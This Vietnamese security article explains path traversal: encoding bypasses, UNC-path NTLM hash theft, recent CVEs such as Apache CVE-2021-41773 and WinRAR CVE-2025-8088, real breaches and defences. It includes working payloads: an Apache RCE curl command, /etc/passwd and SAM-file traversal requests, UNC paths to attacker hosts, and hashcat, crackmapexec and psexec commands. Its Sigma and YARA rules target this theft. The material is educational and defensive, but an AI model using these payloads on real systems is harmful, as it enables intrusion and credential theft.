Chuyện Cũ Mà Không Hề Cũ: Path Traversal Và 106 Triệu Khách Hàng Capital One

TL;DR

Path traversal tăng 85% trong ứng dụng closed-source (2023-2024), gây ra breach ảnh hưởng 106 triệu khách hàng và hàng trăm triệu USD thiệt hại—nhưng vẫn bị đánh giá thấp. Bài viết này giúp đội bảo mật hiểu rõ kỹ thuật bypass hiện đại, CVE nghiêm trọng 2023-2025, và triển khai phòng ngừa đa lớp ngay trong tuần.

MỞ BÁT – KHI "LỖI CƠ BẢN" TRỞ THÀNH ÁC MỘNG TỈ ĐÔ

Tháng trước, một đồng nghiệp hỏi tôi: "Path traversal à? Cái lỗi ../ mà sinh viên năm 2 cũng biết ấy hả?" Tôi gật đầu, rồi đẩy cho anh ấy một bản báo cáo: Capital One mất $100 triệu xử lý breach ảnh hưởng 106 triệu khách hàng; Fortinet FortiOS bị khai thác suốt 6 năm để cài ransomware; WinRAR vừa vào danh sách CISA KEV tháng 9/2025 vì bị exploit in-the-wild. Anh ấy im lặng.

Sự thật đen tối là: path traversal không hề "cơ bản". Nó tăng 85% trong closed-source apps từ 2023 sang 2024, chiếm 3.5% tổng lỗ hổng, đứng thứ 8 trong danh sách CWE Top 25 của MITRE. Hơn 20 năm tồn tại, nó vẫn là vé vào cửa yêu thích của ransomware gang (64% lỗ hổng VPN dẫn đến ransomware), APT group, và... cả bug bounty hunter kiếm $5,000–$12,000 mỗi finding.

Vậy tại sao? Bởi vì đằng sau chuỗi ../ đơn giản là mê cung encoding: double URL encoding, Unicode U+002E, overlong UTF-8 %c0%af, null byte %00, Windows backslash \, UNC path \\attacker\share, và cả reserved device name CON/PRN trên Windows. Bởi vì mobile có ContentProvider (90%+ Android app dính lỗi theo Oversecured), Python có os.path.join() "nuốt base path" khi gặp absolute path, và CVE-2007-4559 trong tarfile ảnh hưởng 350,000+ dự án nhưng Python team cố tình không vá vì "designed behavior".

1. Path Traversal Hiện Đại: Vượt Xa `../` – Chào Mừng Đến Mê Cung Encoding

Giả sử bạn viết validation đơn giản như này:

filename = request.args.get('file')
if '../' in filename or '..' in filename:
    return "Nice try, hacker!"
return send_file(f"/var/www/files/{filename}")

Trông có vẻ an toàn? Sai rồi. Đây là lúc cuộc chơi mới bắt đầu.

A. URL Encoding – Lớp Ngụy Trang Đầu Tiên

Bản chất: HTTP request tự động decode URL-encoded characters. Ký tự . (dấu chấm) có mã ASCII 0x2E → encode thành %2e. Ký tự / (slash) có mã ASCII 0x2F → encode thành %2f.

Attack flow:

1. Attacker gửi: GET /download?file=%2e%2e%2f%2e%2e%2fetc/passwd
2. Web server decode: %2e%2e%2f → ../
3. Validation check: "../" in filename? → False (vì lúc check còn là %2e%2e%2f)
4. Application decode lần 2 (hoặc server tự decode) → ../../../etc/passwd
5. File system resolve → /var/www/files/../../../etc/passwd → /etc/passwd

Payload thực tế:

GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1
Host: vulnerable-app.com

Tại sao bypass? Validation check chuỗi literal ../, nhưng payload lúc đó vẫn ở dạng %2e%2e%2f—chuỗi khác nhau, filter không match. Khi file system xử lý, framework/server tự decode về ../.

B. Double URL Encoding – Khi Web Server Decode 2 Lần

Bản chất: Nhiều kiến trúc web có 2 layer decoding—ví dụ: reverse proxy (Nginx/Apache) decode 1 lần, rồi application backend (Tomcat/Flask) decode lần 2. Hoặc WAF decode 1 lần để check, rồi app decode lần nữa.

Attack flow:

1. Encode `.` → %2e
2. Encode lần 2: % → %25 → Kết quả: %252e
3. Full payload: %252e%252e%252f (tương đương ../sau 2 lần decode)

Layer 1 (WAF/Reverse Proxy):
   %252e%252e%252f → decode → %2e%2e%2f (vẫn chưa phải ../)
   Validation: "../" in "%2e%2e%2f"? → False ✅ Pass

Layer 2 (Application):
   %2e%2e%2f → decode → ../ (thành traversal sequence)
   File system: /var/www/files/../ → /var/www/ → escape!

Apache CVE-2021-41773 – Case study thực tế:

Apache 2.4.49 thêm hàm ap_normalize_path() để tăng performance
Hàm này xử lý sai sequence .%2e/ (dấu chấm literal + dấu chấm encoded)
Payload: GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Hoặc: GET /icons/.%2e/.%2e/.%2e/etc/passwd
Kết quả: 112,000 server dính lỗi, exploit public trong 24 giờ, RCE nếu bật mod_cgi

Payload RCE thực tế:

curl --path-as-is \
  'http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' \
  -d 'echo;id'
# Output: uid=1(daemon) gid=1(daemon) groups=1(daemon)

Phiên dịch: Giống như đi qua cửa checkpoint 2 lần—lần 1 bạn mặc đồ bình thường (họ không nghi ngờ), lần 2 vào trong bạn đổi thành đồ ninja. Khi check point 1 scan QR code, họ thấy "khách bình thường"; khi vào checkpoint 2 (không scan lại), bạn đã biến thành kẻ xâm nhập.

C. Unicode 16-bit & Overlong UTF-8 – Trò Mã Hóa Phỉ báng

Unicode 16-bit (IIS 5.0 cũ):

Chuẩn encoding: %u002e (dấu chấm), %u2215 (division slash ∕ nhưng IIS hiểu nhầm thành /)
Payload: %u002e%u002e%u2215 → IIS decode thành ../
Validation thông thường chỉ check ASCII encoding, không handle Unicode

Overlong UTF-8 (Microsoft IIS MS00-078):

UTF-8 chuẩn:

Ký tự / (ASCII 0x2F) → UTF-8: 0x2F (1 byte)

Overlong UTF-8 (vi phạm chuẩn):

Cùng ký tự / → Encode bằng 2 bytes: 0xC0 0xAF → %c0%af
Hoặc 3 bytes: 0xE0 0x80 0xAF → %e0%80%af

Tại sao hoạt động?

Validation: Check string literal ../ hoặc %2f → không match với %c0%af
File system (Windows cũ): Decode UTF-8 → nhận diện 0xC0 0xAF vẫn là /

Payload IIS cổ điển:

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.1

Kết quả: Remote Command Execution trên IIS 4.0/5.0.

Phiên dịch: Giống như viết chữ "DAO" bằng font Unicode lạ ᗪᗩO—con mắt người (validation) thấy khác DAO nên pass, nhưng máy đọc file (UTF-8 decoder) vẫn hiểu đúng nghĩa là "DAO".

D. Null Byte Injection – Khi C String Terminator Làm Loạn mọi thứ

Bản chất:

C/C++ strings kết thúc bằng null byte (\0 hoặc 0x00)
PHP < 5.3.4 và nhiều ngôn ngữ cũ dùng C-based file APIs
Khi gặp null byte → chuỗi bị truncate (cắt bớt)

Attack scenario:

Application logic:

<?php
$file = $_GET['file'];
// Validation: Chỉ cho phép .pdf
if (!preg_match('/\.pdf$/', $file)) {
    die("Only PDF allowed!");
}
// Download file
readfile("/var/www/uploads/" . $file);
?>

Attack flow:

1. Payload: ../../../etc/passwd%00.pdf
2. Validation regex: Check if string ends with '.pdf' → True ✅
   (vì string đầy đủ là: ../../../etc/passwd\0.pdf)
3. Pass validation
4. readfile() sử dụng C API fopen():
   → fopen() đọc đến null byte → chỉ thấy '../../../etc/passwd'
   → Bỏ qua phần '.pdf' phía sau
5. File được đọc: /etc/passwd

Payload thực tế:

GET /download.php?file=../../../etc/passwd%00.pdf HTTP/1.1

Phạm vi ảnh hưởng:

PHP < 5.3.4 (2010)
Perl (CGI cũ)
Embedded systems/IoT firmware (nhiều thiết bị vẫn chạy code cũ)

Phiên dịch: Bạn kiểm tra giấy tờ người ta, thấy ghi "Chứng chỉ kỹ sư.pdf" ở cuối → OK. Nhưng giữa chừng có ký tự vô hình (null byte), nên máy chỉ đọc phần trước null byte: "Bằng giả" → bạn bị lừa.

E. Windows-Specific Bypasses – Đặc Sản Hệ Điều Hành

1. Backslash \ thay cho Forward Slash /:

Windows chấp nhận cả \ và / làm path separator
Nhiều validation chỉ filter / → bypass bằng \

# Vulnerable code
if '/' in filename:
    abort(403)
send_file(BASE + filename)

# Payload: ..\..\..\windows\win.ini
# Validation pass, nhưng Windows resolve: C:\windows\win.ini

2. Case-Insensitive Filesystem:

/etc/passwd   (Linux)
c:\WiNdOwS\sYsTeM32\cOnFiG\sAm  (Windows vẫn tìm thấy)

3. Trailing Dots & Spaces:

Windows tự động strip trailing dots/spaces
file.txt = file.txt. = file.txt = file.txt...

Exploit:

Validation whitelist: ['report.pdf', 'data.csv']
Payload: report.pdf.......... → Windows normalize → report.pdf → Pass!

4. Reserved Device Names (Node.js CVE-2025-27210):

Windows có device names đặc biệt: CON, PRN, AUX, NUL, COM1-9, LPT1-9
Khi truy cập: Windows xử lý như devices, không phải files

// Node.js path.join() bug
const path = require('path');
path.join('C:\\users\\public', 'CON', '..\\..\\..\\windows\\system32')
// Kỳ vọng: C:\users\public\CON\..\..\..\windows\system32
// Thực tế: CON bị Windows xử lý đặc biệt → bypass validation

5. UNC Path (Universal Naming Convention) – NTLM Credential Theft

Bản chất UNC Path:

Format: \\server\share\path\file.txt
Dùng để truy cập network file shares qua SMB protocol (Server Message Block)
Ví dụ hợp pháp: \\file-server\department\reports\Q4.pdf

Tại sao Windows tự động authenticate?

Khi Windows application (web server, service...) xử lý UNC path:

Phát hiện UNC: Nhận diện format \\server\...
SMB Connection: Tự động mở kết nối SMB tới server
NTLM Authentication: Windows tự động gửi credentials của process đang chạy để authenticate
- Nếu IIS chạy với service account COMPANY\webserver$ → gửi credentials của account này
- Nếu app chạy với user context → gửi credentials của user đó

Đây KHÔNG phải lỗi mà là tính năng của Windows: để truy cập network share, phải authenticate. Nhưng hacker lợi dụng để ăn cắp hash.

Attack Flow Chi Tiết:

Bước 1: Attacker setup malicious SMB server

Dùng tool Responder (phổ biến nhất trong pentest):

# Máy attacker (IP: 203.0.113.50)
sudo responder -I eth0 -v

# Responder lắng nghe trên:
# - SMB (445/tcp)
# - HTTP (80/tcp)
# - LLMNR, NBT-NS, mDNS (protocol resolution poisoning)

Responder giả làm SMB server hợp lệ, nhưng ghi lại mọi authentication attempt.

Bước 2: Inject UNC path vào vulnerable application

Giả sử web app có lỗ hổng path traversal:

# Vulnerable Flask app
@app.route('/download')
def download():
    filename = request.args.get('file')
    # Không validate → chấp nhận UNC path
    return send_file(filename)

Payload:

GET /download?file=\\203.0.113.50\share\report.pdf HTTP/1.1
Host: vulnerable-company.com

Hoặc trong upload form:

<!-- User upload file với filename độc -->
<input type="file" name="logo" />
<!-- Attacker đổi filename thành UNC path -->

Bước 3: Windows xử lý UNC path → tự động authenticate

1. Application nhận parameter: \\203.0.113.50\share\report.pdf
2. Python send_file() → Windows API CreateFile()
3. Windows nhận diện UNC path → khởi tạo SMB connection
4. SMB Client (victim server) → SMB Server (attacker 203.0.113.50)
5. SMB handshake:

   Victim → Attacker: SMB Negotiate Protocol Request
   Attacker → Victim: SMB Negotiate Protocol Response (yêu cầu NTLM auth)

   Victim → Attacker: SMB Session Setup (gửi NTLM authentication)
   ├─ Username: COMPANY\webserver$
   ├─ Domain: COMPANY
   └─ NTLMv2 Response Hash:
      - Challenge từ attacker: 1122334455667788
      - Response: hash(NT hash + challenge)

NTLM Authentication Flow:

[Victim Server]                    [Attacker SMB Server]
       |                                     |
       |-- NEGOTIATE_PROTOCOL_REQ -------->  |
       |<-------- CHALLENGE (random) --------|  (attacker gửi challenge: 8 bytes random)
       |                                     |
       |-- AUTHENTICATE_REQ --------------->  |  (victim hash password + challenge → response)
       |   Username: COMPANY\webserver$      |
       |   Domain: COMPANY                   |
       |   NTLMv2-Response: [hash data]      |
       |                                     |
       |                         ✅ Attacker capture hash!

Hash bắt được có format:

webserver$::COMPANY:1122334455667788:hash_part1:hash_part2

Đây là NTLMv2 Response - không phải plaintext password, nhưng có thể crack offline để lấy password.

Bước 4: Responder capture hash

Output trên terminal attacker:

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.1.100
[SMB] NTLMv2-SSP Username : COMPANY\webserver$
[SMB] NTLMv2-SSP Hash     : webserver$::COMPANY:1122334455667788:A4F2D9B31C8E6745:0101000000000000C0653150DE09D201B4E5A7FB8934B7CA000000000200080053004D0042003100...

[+] Hash saved to /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.100.txt

Bước 5: Crack hash offline với Hashcat

# Copy hash vào file
echo 'webserver$::COMPANY:1122...:A4F2...' > hash.txt

# Crack với hashcat (mode 5600 = NTLMv2)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

# Hoặc dùng rules để tăng hiệu quả
hashcat -m 5600 hash.txt rockyou.txt -r best64.rule

# Output khi crack thành công:
webserver$::COMPANY:1122...:A4F2...:P@ssw0rd2024!

# Password là: P@ssw0rd2024!

Dictionary attack thường thành công vì:

Service accounts thường có password yếu (VD: CompanyName123!, Service2024)
User passwords: Summer2024!, Welcome123, Password1!
Nhiều công ty dùng password pattern: Season+Year+!

Bước 6: Post-Exploitation

Sau khi có password:

A. Lateral Movement:

# Dùng credential để truy cập các máy khác trong domain
crackmapexec smb 192.168.1.0/24 -u webserver$ -p 'P@ssw0rd2024!' --shares

# Hoặc dùng PSExec để remote shell
psexec.py COMPANY/webserver$:'P@ssw0rd2024!'@192.168.1.100

# Shell với quyền service account
C:\Windows\system32>

B. Privilege Escalation:

Nếu service account có quyền cao (Domain Admin, Local Admin) → toàn bộ hệ thống bị compromise
Dump thêm credentials từ LSASS memory
Kerberoasting để lấy thêm service account khác

C. Persistence:

Tạo user backdoor
Cài scheduled task
Golden ticket attack (nếu có Domain Admin)

Real-World Attack Scenarios:

Scenario 1: File Upload

1. Web app cho phép upload avatar/logo
2. Attacker upload file tên: \\attacker.com\x\avatar.png
3. App xử lý filename → Windows SMB connection
4. Credentials leaked

Scenario 2: PDF Generator

# Vulnerable code: user control filename
pdf_path = request.form['output_path']
generate_pdf(pdf_path)  # Hàm dùng Windows API

# Payload:
POST /generate-report
output_path=\\203.0.113.50\reports\output.pdf

# Result: NTLM hash leaked

Scenario 3: Image Processing

<?php
$image_url = $_GET['url'];
// Vulnerable: dùng file_get_contents với UNC path
$data = file_get_contents($image_url);
?>

# Payload:
GET /resize?url=\\attacker.com\images\logo.png

Scenario 4: XXE + UNC (XML External Entity)

<!-- Upload XML với external entity -->
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file://\\attacker.com\share\test.txt">
]>
<root>&xxe;</root>

<!-- Windows XML parser → SMB connection → NTLM leak -->

Tại Sao Attack Này Nguy Hiểm?

Silent credential theft: Victim không hề nhận ra credentials bị leak
No user interaction: Không cần victim click link hay nhập password
Service account = high privilege: Thường có quyền cao hơn user thường
Works through firewalls: SMB outbound thường không bị chặn trong corporate network
Bypass MFA: NTLM authentication không có MFA, chỉ cần username+password

Defense Mechanisms:

1. Firewall Rules (Quan trọng nhất!)

# Block SMB outbound (port 445) tại firewall biên
# Chỉ allow SMB trong internal network
iptables -A OUTPUT -p tcp --dport 445 -d 0.0.0.0/0 -j DROP
iptables -A OUTPUT -p tcp --dport 445 -d 10.0.0.0/8 -j ACCEPT

2. Code Validation

import os
from pathlib import Path

def is_safe_path(user_input):
    # 1. Reject UNC paths
    if user_input.startswith('\\\\') or user_input.startswith('//'):
        raise ValueError("UNC paths not allowed")

    # 2. Reject absolute paths
    if os.path.isabs(user_input):
        raise ValueError("Absolute paths not allowed")

    # 3. Whitelist validation
    safe_path = Path(BASE_DIR) / user_input
    safe_path = safe_path.resolve()

    if not str(safe_path).startswith(str(BASE_DIR)):
        raise ValueError("Path traversal detected")

    return safe_path

3. Windows Registry Hardening

# Disable NTLM authentication outbound
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictSendingNTLMTraffic"=dword:00000002

# Only allow NTLMv2
"LmCompatibilityLevel"=dword:00000005

4. Network Segmentation

Web servers không được phép SMB outbound ra internet
Chỉ allow SMB tới file servers cụ thể (IP whitelist)

5. Monitoring & Detection

# SIEM alert cho:
- Outbound SMB connections (port 445) từ web servers
- NTLM authentication tới external IPs
- Failed authentication attempts với service accounts

# Sigma rule:
title: Suspicious Outbound SMB Connection
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 5140  # Network share access
    Destination: !10.0.0.0/8  # Not internal
  condition: selection

Tưởng tượng bạn có một cái chìa khóa thông minh (Windows credentials) luôn nằm trong túi. Mỗi khi bạn đến cửa nhà ai đó có biển "File Server" (dù thật hay giả), chìa khóa tự động bay ra và quẹt vào khóa để thử mở cửa.

Hacker dựng cái cửa giả (malicious SMB server), treo biển "File Server", rồi inject địa chỉ cửa giả vào app của bạn. App của bạn đến gõ cửa → chìa khóa tự bay ra → hacker copy lại hình dạng chìa khóa (NTLM hash) → về nhà rèn lại chìa khóa thật (crack hash) → có password.

Đây KHÔNG phải lỗi của Windows, mà là tính năng hợp pháp bị lạm dụng. Giống như bạn thiết lập "tự động mở cửa khi thấy biển File Server"—tiện lợi nhưng nguy hiểm nếu không phân biệt được cửa thật/giả.

F. Kết Luận: Đa Tầng Bypass Trong Thực Chiến

Trong pentest/bug bounty, attacker thường kết hợp nhiều kỹ thuật:

Ví dụ combo attack:

# Lớp 1: Double encoding
# Lớp 2: Backslash (Windows)
# Lớp 3: Null byte

GET /api/download?file=%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cconfig%255csam%00.pdf

Decode lần 1: %2e%2e%5c%2e%2e%5cwindows%5csystem32%5cconfig%5csam%00.pdf
Decode lần 2: ..\..\..\windows\system32\config\sam\0.pdf
File API read: ..\..\..\windows\system32\config\sam (truncate tại null byte)
Result: Đọc được SAM database (Windows password hashes)

Defense bypass checklist mà attacker nghĩ:

✅ Filter ../? → Dùng %2e%2e%2f
✅ Filter %2e? → Dùng %252e (double)
✅ Chỉ allow Linux path? → Dùng \ trên Windows
✅ Check extension .pdf? → Thêm %00 trước extension
✅ WAF block? → Mix encoding (%2e + . + %5c)

Phiên dịch tổng thể: Hãy tưởng tượng bạn cấm người ta không được đi cửa sau (filter ../). Nhưng:

Hắn mặc áo ngụy trang (URL encode)
Nói tiếng nước ngoài (Unicode/UTF-8)
Mang 2 bộ đồ, đổi ở giữa đường (double encoding)
Dùng cửa bên cạnh không ai để ý (backslash trên Windows)
Mang giấy thông hành giả có con dấu vô hình (null byte)

Security check của bạn không nhận ra từng lớp ngụy trang này → cửa tự mở.

2. CVE 2023–2025: Khi "Hello world của Hacking" Có Điểm CVSS 9.8

Từ 2023 đến nay, 11 CVE lớn liên quan path traversal, 4 cái đạt critical severity (≥9.0). Một vài highlight:

2023:

CVE-2023-50164 (Apache Struts 2) – CVSS 9.8, khai thác uploadFileName để upload JSP webshell → RCE
CVE-2023-32235 (Ghost CMS) – không cần auth, đọc file qua /assets/built/../..//, lộ env variables ra internet

2024:

CVE-2024-38816 & CVE-2024-38819 (Spring Framework) – high severity, double URL encoding bypass, đọc mọi file mà Spring process chạm được
CVE-2024-13059 (AnythingLLM) – AI platform cũng dính: multer library xử lý non-ASCII filename sai, attacker upload ../../malicious.sh → RCE

2025:

CVE-2025-42937 (SAP Print Service) – CVSS 9.8, network accessible, zero privilege, full CIA compromise
CVE-2025-27210 (Node.js) – Windows reserved name CON/PRN/AUX + traversal bypass path.join() và path.normalize()
CVE-2025-8088 (WinRAR) – đang bị exploit in-the-wild, CISA bắt patch trước 02/09/2025

Deep Dive: CVE-2025-8088 WinRAR – Zero-Day Được Bán $80,000 Trên Dark Web

Timeline & CISA Response:

30/07/2025: WinRAR 7.13 release, vá lỗi im lặng
18/07/2025: ESET phát hiện zero-day đang bị khai thác in-the-wild
12/08/2025: CISA thêm vào Known Exploited Vulnerabilities (KEV) catalog
Deadline: 02/09/2025 – Federal agencies phải patch hoặc ngừng sử dụng
CVSS: 8.4 (High severity)
Affected: WinRAR < 7.13 (Windows only, Linux/Android không ảnh hưởng)

Tại sao nguy hiểm?

350 triệu người dùng WinRAR toàn cầu
Khai thác thành công không cần user interaction (chỉ cần mở thư mục chứa RAR độc)
APT group RomCom (Russia-aligned, aka Storm-0978) sử dụng từ 18-21/07/2025
Dark web có exploit rao bán $80,000
Paper Werewolf (threat actor khác) cũng sử dụng → nhiều nhóm có exploit

Technical Mechanism: Alternate Data Streams (ADS) Exploitation

Bản chất ADS:

Windows hỗ trợ Alternate Data Streams từ NTFS
Mỗi file có thể có nhiều "streams" ẩn bên cạnh data chính
Cú pháp: filename.txt:stream_name:$DATA
Ví dụ: resume.pdf:malware.exe:$DATA → chứa executable trong stream ẩn của PDF

Lỗ hổng trong WinRAR:

WinRAR xử lý ADS trong archive không validate path, cho phép attacker:

Craft file RAR chứa ADS với traversal sequence trong tên stream
Khi extract → WinRAR ghi file vào arbitrary location qua ADS path manipulation
Target phổ biến: Windows Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\)

Attack Flow Chi Tiết:

Bước 1: Attacker craft malicious RAR

Archive structure (nhìn từ bên ngoài):

resume.rar
└── resume.pdf  (file duy nhất người dùng thấy)

Nhưng thực tế bên trong có nhiều ADS ẩn:

resume.rar (internal structure)
├── resume.pdf (benign file - người dùng thấy)
├── resume.pdf:..\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe:$DATA
├── resume.pdf:..\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\loader.dll:$DATA
└── resume.pdf:..\..\..\..\Users\Public\Documents\backdoor.vbs:$DATA

Bước 2: Social engineering delivery

RomCom campaign (18-21/07/2025):

From: [email protected] (spoofed)
Subject: Job Application - Senior Security Engineer

Dear Hiring Manager,

Please find attached my resume for the Senior Security Engineer position.

Attachment: John_Smith_Resume.rar

Target sectors:

Financial institutions (Europe)
Manufacturing (Canada)
Defense contractors
Logistics companies

Bước 3: Victim extracts RAR

User action:
1. Download John_Smith_Resume.rar
2. Right-click → "Extract Here" hoặc double-click
3. WinRAR extracts:
   - resume.pdf → %TEMP%\Extracted\resume.pdf ✅ (benign)
   - ADS paths → traversal ra ngoài!

Actual extraction:
C:\Users\Victim\Downloads\Extracted\resume.pdf (benign file)
C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe (malware!)
C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\loader.dll
C:\Users\Victim\Users\Public\Documents\backdoor.vbs

Bước 4: Malware execution

Timeline:
T+0:    User extracts RAR
T+1s:   evil.exe written to Startup folder (victim không thấy gì)
T+??:   User reboot hoặc logout/login
T+boot: Windows tự động chạy evil.exe từ Startup
        → Backdoor established, no AV alert (vì file "hợp pháp" trong Startup)

Bước 5: Post-Exploitation

RomCom deployed malware:

SnipBot (custom backdoor): C2 communication, screenshot capture, keylogging
RustyClaw (info stealer): Browser cookies, saved passwords, crypto wallets
Mythic agent (post-exploitation framework): lateral movement, privilege escalation, data exfiltration

Paper Werewolf campaign:

Target: Russian organizations (domestic cybercrime)
Payload: Banking trojans, credential stealers
Purchased exploit from dark web vendor ($80,000)

Real-World Impact:

Victim distribution:

Financial: Banks, investment firms → credential theft → wire fraud
Manufacturing: IP theft, supply chain compromise
Defense: Classified data exfiltration, espionage
Logistics: Ransomware deployment via supply chain access

Detection challenges:

No UI warning: WinRAR không hiển thị ADS khi list contents
AV bypass: Malware dropped vào Startup folder trông "legitimate"
User trust: File .rar từ "job applicant" không bị nghi ngờ
Delayed execution: Malware chỉ chạy sau reboot → forensics khó trace

Proof of Concept (Concept Only – Không Exploit Chi Tiết)

Cấu trúc RAR độc hại (defensive understanding):

# Conceptual structure - KHÔNG phải exploit code thực tế
Archive contains:
- Visible file: "document.pdf"
- Hidden ADS:
  * Stream name: "..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"
  * Stream data: [malware binary]

When WinRAR extracts → writes to:
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Indicators of Compromise (IOCs):

File artifacts:
- Unexpected executables in Startup folder
- Recently modified files in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
- RAR archives with ADS (check with: dir /r *.rar)

Registry:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run (new entries)
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

Network:
- Outbound C2 connections to known RomCom infrastructure
- IPs: [REDACTED - check threat intelligence feeds]

Defense & Mitigation:

1. Immediate Actions (Priority 1):

# Check WinRAR version
"C:\Program Files\WinRAR\WinRAR.exe" -? | findstr "Version"

# If < 7.13 → Update immediately:
# Download from: https://www.win-rar.com/download.html

2. Detect Existing Compromise:

# PowerShell: Scan Startup folders cho unexpected files
Get-ChildItem -Path "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Force |
  Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) } |
  Select-Object Name, LastWriteTime, Length

# Check for ADS trong archives
Get-ChildItem -Recurse -Filter *.rar | ForEach-Object {
    Get-Item $_.FullName -Stream * | Where-Object Stream -ne ':$DATA'
}

3. Endpoint Protection:

Windows Defender (updated): Signature Trojan:Win32/WinrarExploit
EDR rules: Alert on .exe creation in Startup folders not initiated by MSI/setup
Application whitelisting: Chỉ cho phép signed executables chạy từ Startup

4. Email Security:

YARA rule:
rule WinRAR_CVE_2025_8088_ADS {
    meta:
        description = "Detect RAR with suspicious ADS patterns"
        author = "SOC Team"
        date = "2025-08"
    strings:
        $ads1 = "..\\..\\.." ascii wide
        $ads2 = "Startup" ascii wide nocase
        $ads3 = ":$DATA" ascii wide
    condition:
        uint32(0) == 0x21726152 and  // RAR signature
        2 of ($ads*)
}

5. User Awareness:

Không mở RAR/ZIP từ email không rõ nguồn gốc
Kiểm tra sender kỹ (RomCom spoof HR emails)
Dùng online sandbox: VirusTotal, Any.Run trước khi extract
Enable "Show hidden files" + "Show file extensions" trong Windows Explorer

Why This Matters for Your Organization:

Nếu bạn nghĩ "chúng tôi không dùng WinRAR" → sai lầm nghiêm trọng:

End users tự cài: 350 triệu downloads, nhiều nhân viên cài personal copy
Legacy systems: Nhiều server/workstation cũ vẫn có WinRAR pre-installed
Supply chain: Partners, vendors gửi file RAR → IT staff extract bằng WinRAR
BYOD: Personal devices truy cập corporate network

RomCom không chọn random targets – họ research kỹ:

LinkedIn reconnaissance → biết công ty dùng công nghệ gì
Spear-phishing emails cực kỳ convincing
Timing attacks: Gửi "resume" khi công ty đang tuyển dụng (check job posts)

Cost of compromise:

Incident response: $50,000–$200,000 (forensics, remediation)
Ransomware (if escalated): Trung bình $4.5M (IBM 2024 Cost of Data Breach Report)
IP theft: Immeasurable cho defense/manufacturing
Compliance fines: GDPR €20M or 4% revenue

3. Mobile & Backend: ContentProvider, os.path.join(), Và 350,000 Dự Án Khóc Thầm

Android ContentProvider – 90%+ app dính lỗi (Oversecured research):

openFile() method thiếu validation → attacker gửi content://com.victim.provider/../../shared_prefs/secrets.xml, Android tự decode thành ../../../shared_prefs/secrets.xml
Truy cập database, SharedPreferences (chứa token/API key), cached files trong /data/data/com.victim/
Dirty Stream attack (Microsoft 2023): dùng FileProvider với _display_name độc → ghi file vào ../../lib/malicious.so → load library → RCE
Google Play Store auto-scan từ 16/01/2018, chặn app dính lỗ hổng, nhưng vẫn có app lọt

Python os.path.join() – bẫy chết người:

os.path.join('/var/www/files/', '/etc/passwd')
# → Trả về: '/etc/passwd' (base bị nuốt!)

Nếu user input là absolute path, tất cả component trước đó biến mất. Fix: dùng pathlib:

from pathlib import Path
base = Path('/var/www/files/').resolve()
requested = (base / user_input).resolve()
if requested.is_relative_to(base):  # Python 3.9+
    # OK, trong phạm vi

CVE-2007-4559 (tarfile) – drama 18 năm:

Lỗ hổng trong tar.extractall() từ 2007, CVSS 9.8
Ảnh hưởng 350,000+ open-source projects
Python team cố tình không vá vì "working as designed"
Malicious .tar chứa ../../etc/cron.d/evil → extract ra ngoài → cron job chạy code
Python 3.12+ mới có filter: tar.extractall(filter='data') (PEP 706)

Phiên dịch: Bạn bảo Python giải nén file vào thư mục /tmp/safe/, nhưng file trong archive tên là ../../../root/.ssh/authorized_keys—Python vâng lời giải nén đúng tên đó, thế là hacker có SSH key vào server.

CVE-2007-4559 ra đời năm tôi học cấp 1. Giờ tôi đã làm security engineer, nó vẫn chưa được fix. Có lẽ Python team đang chờ tôi về hưu.

4. Breach Thực Tế: $100 Triệu, 106 Triệu Người, Và 6 Năm ác mộng

Capital One (2019):

106 triệu hồ sơ bị đánh cắp (100M Mỹ, 6M Canada): 140k SSN, 80k bank account, 1M SIN
Kết hợp SSRF + path traversal vào S3 bucket metadata
Thiệt hại: cổ phiếu rớt 5.9% ngay, mất 15% trong 2 tuần; chi phí xử lý $80–100 triệu; kiện tụng class action; 2 năm credit monitoring cho 106M người
Nguyên nhân: WAF config sai, IAM role quá quyền, monitoring kém → attacker lởn vởn vài tháng không ai biết

Fortinet FortiOS CVE-2018-13379 – 6 năm chưa hết ác mộng:

Path traversal trong SSL VPN, đọc file sslvpn_websession chứa plaintext username/password
Vá từ 5/2019, công bố tại Black Hat 8/2019
2021: 14,528 endpoint vẫn dính lỗi, credential bán trên dark web $100–10,000/cái
EPSS score 97% (top 3% most likely exploited)
Dùng làm initial access cho Cring ransomware (1/2021), APT groups, CISA alert AA20-283A & AA20-296A
64% VPN vulnerabilities dẫn đến ransomware campaign

Bug bounty – path traversal vẫn "ngon ăn":

Opera Cashback (XSS chain qua path traversal): $8,000
Reverb (DOM XSS via double encoding): $5,000
NFT platform (Next.js router misconfig): $4,000
HackerOne reports: $888–$12,000 (Apache, GitLab, Vanilla Forums, U.S. DoD)

BA BÀI HỌC BẢO MẬT ÁP DỤNG NGAY

Bài học 1: Dùng Indirect Reference – Đừng Bao Giờ Tin User Input Cho File Path

Thay vì:

filename = request.args.get('file')
return send_file(f"/var/www/uploads/{filename}")

Hãy dùng:

FILE_MAP = {
    '1': 'report_jan.pdf',
    '2': 'report_feb.pdf'
}
file_id = request.args.get('id')
if file_id in FILE_MAP:
